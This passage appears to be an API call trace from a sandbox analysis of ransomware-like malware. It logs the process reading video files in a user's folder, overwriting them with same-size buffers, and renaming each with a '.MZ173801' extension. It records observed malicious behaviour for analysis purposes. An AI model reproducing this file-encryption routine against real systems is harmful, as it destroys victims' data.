lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.279] GetCurrentThreadId () returned 0x1358 [0119.279] GetCurrentThreadId () returned 0x1358 [0119.279] GetCurrentThreadId () returned 0x1358 [0119.280] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.280] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.280] GetCurrentThreadId () returned 0x1358 [0119.280] GetCurrentThreadId () returned 0x1358 [0119.280] GetCurrentThreadId () returned 0x1358 [0119.280] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\51xMNOj.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\51xmnoj.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.280] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0119.280] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.280] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x1322 [0119.281] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.281] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1322, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x1322, lpOverlapped=0x0) returned 1 [0119.281] CloseHandle (hObject=0x3d0) returned 1 [0119.282] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\51xMNOj.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\51xmnoj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.283] WriteFile (in: hFile=0x3d0, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x1322, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f6f0*=0x1322, lpOverlapped=0x0) returned 1 [0119.284] CloseHandle (hObject=0x3d0) returned 1 [0119.285] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\51xMNOj.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\51xmnoj.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\51xMNOj.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\51xmnoj.flv.mz173801")) returned 1 [0119.285] GetCurrentThreadId () returned 0x1358 [0119.285] GetCurrentThreadId () returned 0x1358 [0119.285] GetCurrentThreadId () returned 0x1358 [0119.285] GetCurrentThreadId () returned 0x1358 [0119.285] GetCurrentThreadId () returned 0x1358 [0119.285] GetCurrentThreadId () returned 0x1358 [0119.285] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96c584e0, ftCreationTime.dwHighDateTime=0x1d5e1a8, ftLastAccessTime.dwLowDateTime=0x31f0e620, ftLastAccessTime.dwHighDateTime=0x1d5e452, ftLastWriteTime.dwLowDateTime=0x31f0e620, ftLastWriteTime.dwHighDateTime=0x1d5e452, nFileSizeHigh=0x0, nFileSizeLow=0xa06f, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="JKmlrtcd1CFx0.mp4", cAlternateFileName="JKMLRT~1.MP4")) returned 1 [0119.489] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.489] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.489] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\JKmlrtcd1CFx0.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\jkmlrtcd1cfx0.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96c584e0, ftCreationTime.dwHighDateTime=0x1d5e1a8, ftLastAccessTime.dwLowDateTime=0x31f0e620, ftLastAccessTime.dwHighDateTime=0x1d5e452, ftLastWriteTime.dwLowDateTime=0x31f0e620, ftLastWriteTime.dwHighDateTime=0x1d5e452, nFileSizeHigh=0x0, nFileSizeLow=0xa06f)) returned 1 [0119.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.490] GetCurrentThreadId () returned 0x1358 [0119.490] GetCurrentThreadId () returned 0x1358 [0119.490] GetCurrentThreadId () returned 0x1358 [0119.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.491] GetCurrentThreadId () returned 0x1358 [0119.491] GetCurrentThreadId () returned 0x1358 [0119.491] GetCurrentThreadId () returned 0x1358 [0119.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\JKmlrtcd1CFx0.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\jkmlrtcd1cfx0.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.491] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0119.491] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.491] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xa06f [0119.491] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.492] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xa06f, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xa06f, lpOverlapped=0x0) returned 1 [0119.493] CloseHandle (hObject=0x3d0) returned 1 [0119.493] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\JKmlrtcd1CFx0.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\jkmlrtcd1cfx0.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.494] WriteFile (in: hFile=0x3d0, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xa06f, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f6f0*=0xa06f, lpOverlapped=0x0) returned 1 [0119.496] CloseHandle (hObject=0x3d0) returned 1 [0119.498] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\JKmlrtcd1CFx0.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\jkmlrtcd1cfx0.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\JKmlrtcd1CFx0.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\jkmlrtcd1cfx0.mp4.mz173801")) returned 1 [0119.498] GetCurrentThreadId () returned 0x1358 [0119.498] GetCurrentThreadId () returned 0x1358 [0119.498] GetCurrentThreadId () returned 0x1358 [0119.498] GetCurrentThreadId () returned 0x1358 [0119.498] GetCurrentThreadId () returned 0x1358 [0119.498] GetCurrentThreadId () returned 0x1358 [0119.498] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3814fd0, ftCreationTime.dwHighDateTime=0x1d5e9b8, ftLastAccessTime.dwLowDateTime=0x643eaec0, ftLastAccessTime.dwHighDateTime=0x1d5e13a, ftLastWriteTime.dwLowDateTime=0x643eaec0, ftLastWriteTime.dwHighDateTime=0x1d5e13a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="NVV_UxLtcOyTWBX", cAlternateFileName="NVV_UX~1")) returned 1 [0119.498] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dd2e3c0, ftCreationTime.dwHighDateTime=0x1d5efef, ftLastAccessTime.dwLowDateTime=0x304d76b0, ftLastAccessTime.dwHighDateTime=0x1d5f084, ftLastWriteTime.dwLowDateTime=0x304d76b0, 